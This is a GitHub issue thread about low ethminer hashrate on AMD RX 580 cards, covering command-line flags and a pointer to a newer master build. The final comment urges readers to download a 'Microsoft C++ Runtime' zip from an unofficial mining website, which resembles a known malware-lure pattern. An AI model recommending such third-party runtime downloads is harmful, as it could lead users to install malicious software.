### ISSUE TITLE
low hashrate

### ISSUE THREAD

**Issue by davidwillis** [ethereum-mining/ethminer#414]
Hi,
I have used ethminer with my gtx 1070 cards, and they work fine.  However I am not using rx 580 cards, and the hashrate is very slow.
With my six rx580 cards, I get over 180mh/s using claymore (174 with the nofee option).  However with ethminer I am only getting 130-135mh/s.  I am sure I have something wrong to be this low.  Both are using the same overclock (using msi afterburner), and the same modded bios.

Here is my start file.
ethminer --farm-recheck 200 -G --opencl-platform 1 -S us1.ethermine.org:4444 -O ee8866a0f1e6fae19cb5ddfbcdfc6ca076c1d73b.rig1

Also I am running windows 10.

**Comment by smurfy** [comment]
Use:
``ethminer -U --opencl-platform 1 -S us1.ethermine.org:4444 -O ee8866a0f1e6fae19cb5ddfbcdfc6ca076c1d73b.rig1``

``-G`` is for OpenCL which is basically AMD and ``-U``  with is CUDA for nvidia cards.
If you have a mixed rig, use ``-X``

**Comment by davidwillis** [comment]
But I am running amd cards.... So I need to use OpenCl

**Comment by smurfy** [comment]
sorry, i misunderstood.  0.12 is slower as ethminer with opencl, this is correct.
Version 0.13 (current master) will be at least the same speed, but has currently a bug somewhere causing 100% cpu load. 

So you can either wait till we find the bug and 0.13 is released or use a version from master branch.
Currently lastest master windows build: 
https://ci.appveyor.com/project/ethereum-mining/ethminer/build/439/job/0yj4dk4km08ayhj7/artifacts

**Comment by sircoins** [comment]
Hi.
Try install runtimes to solve your problem.
I had same problem and fixed by runtimes setup.

http://how-to-mine.com/softwares/runtimes/Microsoft_C++_Runtime.zip
